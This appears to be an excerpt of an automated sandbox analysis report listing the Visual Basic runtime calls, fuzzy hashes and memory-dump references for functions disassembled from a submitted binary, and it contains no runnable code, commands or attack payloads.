__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 004509FB
__vbaFreeObj.MSVBVM60 ref: 00450A0A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00450A39
__vbaLateIdSt.MSVBVM60(00000000), ref: 00450A3C
__vbaFreeObj.MSVBVM60 ref: 00450A45

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$_adj_fdiv_m64$ErrorLateNew2System$#588List
String ID:
API String ID: 72533341-0
Opcode ID: 3df4352559dd52fe06ae93bb0a88127b036d34825ec59f6c8798ac399bd20b36
Instruction ID: 92afa635787998e240ad45abc3e8f3c0f3380fa3e221043ccb8f58c115ebf42b
Opcode Fuzzy Hash: 3df4352559dd52fe06ae93bb0a88127b036d34825ec59f6c8798ac399bd20b36
Instruction Fuzzy Hash: 02B18F74A00205DFCB04DFA5DD84AAEBBB9FB49305F10813AE945E32B1EB749845CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00459E80, Relevance: 36.2, APIs: 24, Instructions: 193COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401E96), ref: 00459E9E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401E96), ref: 00459EE5
#685.MSVBVM60(?,?,?,?,00401E96), ref: 00459EF2
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401E96), ref: 00459EFD
__vbaFreeObj.MSVBVM60(?,?,?,?,00401E96), ref: 00459F15
__vbaChkstk.MSVBVM60 ref: 00459F35
__vbaObjSet.MSVBVM60(?,00000000), ref: 00459F69
__vbaLateIdSt.MSVBVM60(00000000), ref: 00459F70
__vbaFreeObj.MSVBVM60 ref: 00459F79
__vbaObjSet.MSVBVM60(?,00000000), ref: 00459F9E
__vbaLateIdCall.MSVBVM60(00000000), ref: 00459FA5
__vbaFreeObj.MSVBVM60(?,?,00401E96), ref: 00459FB1
#685.MSVBVM60(?,?,00401E96), ref: 00459FBE
__vbaObjSet.MSVBVM60(00000000,00000000,?,?,00401E96), ref: 00459FC9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409B70,0000001C), ref: 00459FFC
__vbaFreeObj.MSVBVM60 ref: 0045A029
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A05A
__vbaLateIdCallLd.MSVBVM60(?,00000000), ref: 0045A065
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,00401E96), ref: 0045A06F
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401E96), ref: 0045A07B
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401E96), ref: 0045A084
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,00401E96), ref: 0045A0A5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000054), ref: 0045A0D8
__vbaFreeObj.MSVBVM60 ref: 0045A0F3

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$Late$#685CallCheckChkstkHresult$Error
String ID:
API String ID: 2740616474-0
Opcode ID: 328975d3ced66a4183263c0aeeb6a78ea5c9f1f03f84763729f35efa680459dd
Instruction ID: 4c7da4dfbf622e5a27b4656c69635a86c0ce22e6a6c4060639ef15f9c80bc50d
Opcode Fuzzy Hash: 328975d3ced66a4183263c0aeeb6a78ea5c9f1f03f84763729f35efa680459dd
Instruction Fuzzy Hash: E981E775900208EFCB04DFA4C988BEEBBB5FF48345F148559F606BB2A0DB749945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0045A500, Relevance: 36.2, APIs: 24, Instructions: 193COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401E96), ref: 0045A51E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401E96), ref: 0045A565
#685.MSVBVM60(?,?,?,?,00401E96), ref: 0045A572
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401E96), ref: 0045A57D
__vbaFreeObj.MSVBVM60(?,?,?,?,00401E96), ref: 0045A595
__vbaChkstk.MSVBVM60 ref: 0045A5B5
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A5E9
__vbaLateIdSt.MSVBVM60(00000000), ref: 0045A5F0
__vbaFreeObj.MSVBVM60 ref: 0045A5F9
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A61E
__vbaLateIdCall.MSVBVM60(00000000), ref: 0045A625
__vbaFreeObj.MSVBVM60(?,?,00401E96), ref: 0045A631
#685.MSVBVM60(?,?,00401E96), ref: 0045A63E
__vbaObjSet.MSVBVM60(00000000,00000000,?,?,00401E96), ref: 0045A649
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409B70,0000001C), ref: 0045A67C
__vbaFreeObj.MSVBVM60 ref: 0045A6A9
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A6DA
__vbaLateIdCallLd.MSVBVM60(?,00000000), ref: 0045A6E5
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,00401E96), ref: 0045A6EF
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401E96), ref: 0045A6FB
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401E96), ref: 0045A704
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,00401E96), ref: 0045A725
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000054), ref: 0045A758
__vbaFreeObj.MSVBVM60 ref: 0045A773

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$Late$#685CallCheckChkstkHresult$Error
String ID:
API String ID: 2740616474-0
Opcode ID: cb7e88086c12d920ab3f0974660dde332578db43a44faa4cf65e35197c7a17a9
Instruction ID: d0df07f73d488ee17419905e92165c84ed7a501c6c4210d51b9f55f7601aa115
Opcode Fuzzy Hash: cb7e88086c12d920ab3f0974660dde332578db43a44faa4cf65e35197c7a17a9
Instruction Fuzzy Hash: B281E775900208EFCB04DFA4C988BEEBBB5BF48345F148569F506AB2A0DB749945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0045A7D0, Relevance: 36.2, APIs: 24, Instructions: 193COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401E96), ref: 0045A7EE
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401E96), ref: 0045A835
#685.MSVBVM60(?,?,?,?,00401E96), ref: 0045A842
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401E96), ref: 0045A84D
__vbaFreeObj.MSVBVM60(?,?,?,?,00401E96), ref: 0045A865
__vbaChkstk.MSVBVM60 ref: 0045A885
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A8B9
__vbaLateIdSt.MSVBVM60(00000000), ref: 0045A8C0
__vbaFreeObj.MSVBVM60 ref: 0045A8C9
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A8EE
__vbaLateIdCall.MSVBVM60(00000000), ref: 0045A8F5
__vbaFreeObj.MSVBVM60(?,?,00401E96), ref: 0045A901
#685.MSVBVM60(?,?,00401E96), ref: 0045A90E
__vbaObjSet.MSVBVM60(00000000,00000000,?,?,00401E96), ref: 0045A919
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409B70,0000001C), ref: 0045A94C
__vbaFreeObj.MSVBVM60 ref: 0045A979
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A9AA
__vbaLateIdCallLd.MSVBVM60(?,00000000), ref: 0045A9B5
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,00401E96), ref: 0045A9BF
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401E96), ref: 0045A9CB
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401E96), ref: 0045A9D4
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,00401E96), ref: 0045A9F5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000054), ref: 0045AA28
__vbaFreeObj.MSVBVM60 ref: 0045AA43

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$Late$#685CallCheckChkstkHresult$Error
String ID:
API String ID: 2740616474-0
Opcode ID: b453b39edad942189c1a0748f89c097eeca76734eccb142e261c5b5a0db06d3b
Instruction ID: 71dbae682ac50da627f1e66bba88103aa70feb2081943557dfc78cefd745fde5
Opcode Fuzzy Hash: b453b39edad942189c1a0748f89c097eeca76734eccb142e261c5b5a0db06d3b
Instruction Fuzzy Hash: E281E7B5900208EFCB04DFA4C988BEEBBB5BF48345F148559F50ABB2A0DB749945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004517A0, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 261COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 0045183D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00451864
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00451883
__vbaFreeObj.MSVBVM60 ref: 00451892
__vbaObjSet.MSVBVM60(?,00000000), ref: 00451941
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00451968
#588.MSVBVM60(00000000,00000000,00000000), ref: 00451985
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 004519A2
__vbaFreeObj.MSVBVM60 ref: 004519AB
__vbaObjSet.MSVBVM60(?,00000000), ref: 00451A1D
__vbaLateIdSt.MSVBVM60(00000000), ref: 00451A24
__vbaFreeObj.MSVBVM60 ref: 00451A2D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00451A5F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 00451A7E
__vbaFreeObj.MSVBVM60 ref: 00451A8D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00451ABC
__vbaLateIdSt.MSVBVM60(00000000), ref: 00451ABF
__vbaFreeObj.MSVBVM60 ref: 00451AC8

Strings

VUUU, xrefs: 004518E4

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ErrorLateNew2System$#588List
String ID: VUUU
API String ID: 2526873969-2040033107
Opcode ID: 1ff04f1d3230b2af071af2842332855413bba5a55e12990ab32511a01b7ae97b
Instruction ID: 79d1b8ab4ae4cb2a22374c83493e3ad12d781ac9d92b21fce331fc1ddd92fe13
Opcode Fuzzy Hash: 1ff04f1d3230b2af071af2842332855413bba5a55e12990ab32511a01b7ae97b
Instruction Fuzzy Hash: 82A19375A00205DFCB04DFA9DC84ABABBB9FF49300B14823AE945E73A1E7749845CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00454440, Relevance: 33.3, APIs: 22, Instructions: 314COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 004544DF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00454506
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0045452B
__vbaFreeObj.MSVBVM60 ref: 00454536
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045454A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00454571
__vbaSetSystemError.MSVBVM60(?,00000001,00000001), ref: 00454592
__vbaFreeObj.MSVBVM60 ref: 00454597
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045467F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 004546A6
#588.MSVBVM60(00000000,00000000,00000000), ref: 004546C3
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 004546E0
__vbaFreeObj.MSVBVM60 ref: 004546E9
__vbaObjSet.MSVBVM60(?,00000000), ref: 00454758
__vbaLateIdSt.MSVBVM60(00000000), ref: 0045475F
__vbaFreeObj.MSVBVM60 ref: 00454768
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045479A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 004547B9
__vbaFreeObj.MSVBVM60 ref: 004547C8
__vbaObjSet.MSVBVM60(?,00000000), ref: 004547F7
__vbaLateIdSt.MSVBVM60(00000000), ref: 004547FA
__vbaFreeObj.MSVBVM60 ref: 00454803

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ErrorSystem$LateNew2$#588List
String ID:
API String ID: 3248396246-0
Opcode ID: 09a0a3b3d0732b2ae659532bce42887f5c655d7a84c8101787bd6c688895eb98
Instruction ID: c6857303ace24aeca6bc5580e8a308df0461fc5d61215104bb4e6f4846757e4f
Opcode Fuzzy Hash: 09a0a3b3d0732b2ae659532bce42887f5c655d7a84c8101787bd6c688895eb98
Instruction Fuzzy Hash: FDB1B275A00205DFDB04DFB5DC88AA9BBB9FB89310F048239E845E73A5E6749845CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004626D0, Relevance: 33.1, APIs: 22, Instructions: 131COMMON

Download Yara Rule

APIs

__vbaVarVargNofree.MSVBVM60(?,66106AEE,?), ref: 00462757
__vbaVarVargNofree.MSVBVM60(00000000), ref: 00462763
__vbaVarTstGt.MSVBVM60(00000000), ref: 0046276C
__vbaVarVargNofree.MSVBVM60(00004004,?), ref: 00462786
__vbaVarVargNofree.MSVBVM60(00000000), ref: 00462792
__vbaVarTstGt.MSVBVM60(00000000), ref: 00462795
__vbaVarVargNofree.MSVBVM60(?,?), ref: 004627B4
__vbaVarVargNofree.MSVBVM60(00000000), ref: 004627BF
__vbaVarCmpGt.MSVBVM60(?,00000000), ref: 004627CC
__vbaVarVargNofree.MSVBVM60(00000000), ref: 004627D7
__vbaVarVargNofree.MSVBVM60(00000000), ref: 004627E3
__vbaVarCmpLt.MSVBVM60(?,00000000), ref: 004627EA
__vbaVarAnd.MSVBVM60(?,00000000), ref: 004627FB
__vbaVarVargNofree.MSVBVM60(00000000), ref: 00462807
__vbaVarVargNofree.MSVBVM60(00000000), ref: 00462813
__vbaVarCmpGt.MSVBVM60(?,00000000), ref: 0046281A
__vbaVarAnd.MSVBVM60(?,00000000), ref: 00462821
__vbaVarVargNofree.MSVBVM60(00000000), ref: 0046282D
__vbaVarVargNofree.MSVBVM60(00000000), ref: 00462839
__vbaVarCmpLt.MSVBVM60(?,00000000), ref: 00462840
__vbaVarAnd.MSVBVM60(?,00000000), ref: 0046284E
__vbaBoolVar.MSVBVM60(00000000), ref: 00462851

Part of subcall function 004628B0: __vbaVarVargNofree.MSVBVM60(66109841,6610728D,00004004,?,?,?,?,?,?,?,00000000,00401E96,?), ref: 004628EF
Part of subcall function 004628B0: __vbaVarCopy.MSVBVM60(?,?,?,?,?,?,?,00000000,00401E96,?), ref: 004628F6
Part of subcall function 004628B0: __vbaVarVargNofree.MSVBVM60(?,?,?,?,?,?,?,00000000,00401E96,?), ref: 00462904
Part of subcall function 004628B0: __vbaVargVarCopy.MSVBVM60(?,?,?,?,?,?,?,00000000,00401E96,?), ref: 00462910
Part of subcall function 004628B0: __vbaVargVarCopy.MSVBVM60(?,?,?,?,?,?,?,00000000,00401E96,?), ref: 00462917
Part of subcall function 004628B0: __vbaFreeVar.MSVBVM60(00462928,?,?,?,?,?,?,?,00000000,00401E96,?), ref: 00462921

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Varg$Nofree$Copy$BoolFree
String ID:
API String ID: 632265064-0
Opcode ID: ed665d2ee2f291fbb1abd4d38bc06211be4279b3d79f91ef587bbd756ab8dc0c
Instruction ID: ba8cecb130e532bbaa07582b0e5f005721b66bfeaccd9ab56626e218fbb47076
Opcode Fuzzy Hash: ed665d2ee2f291fbb1abd4d38bc06211be4279b3d79f91ef587bbd756ab8dc0c
Instruction Fuzzy Hash: FD51E1B5D01219AFCB14DFA4CE40FEF77B9AF58300F1045AAA609E3254EA749E45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 004571D0, Relevance: 31.8, APIs: 21, Instructions: 276COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 00457273
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 0045729A
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 004572B9
__vbaFreeObj.MSVBVM60 ref: 004572C8
__vbaFpI4.MSVBVM60 ref: 00457342
__vbaFpI4.MSVBVM60 ref: 00457377
__vbaFpI4.MSVBVM60 ref: 004573B2
__vbaObjSet.MSVBVM60(?,00000000), ref: 004573C7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 004573EE
#588.MSVBVM60(00000000,00000000,00000000), ref: 0045740B
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 00457429
__vbaFreeObj.MSVBVM60 ref: 00457432
__vbaObjSet.MSVBVM60(?,00000000), ref: 004574A7
__vbaLateIdSt.MSVBVM60(00000000), ref: 004574AE
__vbaFreeObj.MSVBVM60 ref: 004574B7
__vbaObjSet.MSVBVM60(?,00000000), ref: 004574E9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 00457508
__vbaFreeObj.MSVBVM60 ref: 00457517
__vbaObjSet.MSVBVM60(?,00000000), ref: 00457546
__vbaLateIdSt.MSVBVM60(00000000), ref: 00457549
__vbaFreeObj.MSVBVM60 ref: 00457552

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ErrorLateNew2System$#588List
String ID:
API String ID: 2526873969-0
Opcode ID: 2e078894391fbb449ed39874d261953392e1dbb78d9136d582e7ae15ffdbaa37
Instruction ID: 67d94c1ef521f13918af3401a8710a401aab4d227d029484bd1bcc4bf5887fe9
Opcode Fuzzy Hash: 2e078894391fbb449ed39874d261953392e1dbb78d9136d582e7ae15ffdbaa37
Instruction Fuzzy Hash: 58B16074A00205DFCB04DFA5DD84ABEBBB8FB49701F10827AE945E32A1EB745845CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00456070, Relevance: 31.7, APIs: 21, Instructions: 185COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401E96), ref: 004560CE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C,?,?,?,?,?,?,?,00401E96), ref: 004560E9
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401E96), ref: 004560F2
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401E96), ref: 00456106
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C,?,?,?,?,?,?,?,00401E96), ref: 00456121
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401E96), ref: 0045612A
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401E96), ref: 0045613E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C,?,?,?,?,?,?,?,00401E96), ref: 00456159
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401E96), ref: 00456162
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401E96), ref: 00456176
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C,?,?,?,?,?,?,?,00401E96), ref: 00456191
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401E96), ref: 0045619A
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401E96), ref: 004561AE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C,?,?,?,?,?,?,?,00401E96), ref: 004561C9
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401E96), ref: 004561D2
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401E96), ref: 004561E6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C,?,?,?,?,?,?,?,00401E96), ref: 00456201
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401E96), ref: 00456210
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401E96), ref: 00456220
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C,?,?,?,?,?,?,?,00401E96), ref: 0045623B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401E96), ref: 00456244

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
